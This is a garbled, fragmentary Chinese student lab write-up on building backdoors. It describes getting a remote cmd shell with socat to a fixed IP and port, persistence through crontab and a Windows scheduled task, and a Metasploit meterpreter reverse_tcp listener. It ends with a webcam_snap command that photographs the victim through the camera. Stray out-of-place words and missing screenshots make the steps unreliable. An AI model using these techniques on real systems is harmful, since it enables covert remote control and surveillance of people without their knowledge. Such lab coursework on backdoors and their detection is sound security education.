1.查看ip
2.监听端口
3.实验成功以下图
linux
1.查看虚拟机ip
2.监听端口
3.实验成功以下图
web
1.用crontab -e指令编辑一条定时任务shell
输入3,选vim.basic
2.成功
vim
在Windows系统下,打开控制面板->管理工具->任务计划程序,建立任务,填写任务名称后,新建一个触发器
在Kali环境下输入指令socat - tcp:192.168.1.111:5234,这里的第一个参数-表明标准的输入输出,第二个流链接到Windows主机的5234端口,此时能够发现已经成功得到了一个cmd shell
windows
1.在Kali上使用msfconsole指令进入msf控制台,set payload windows/meterpreter/reverse_tcp,使用监听模块,设置payload,设置反弹回连的IP和端口
2.利用exploit,执行监听,在windows中,利用20155210.exe运行20155210.exe
3.使用webcam_snap指令可使用摄像头进行拍照
tcp
经过监视程序,查看程序是否得到了不应得到的系统资源。工具
若是可以避免杀毒软件,经过后门能够随意获取不少系统的资源,有很大的危险3d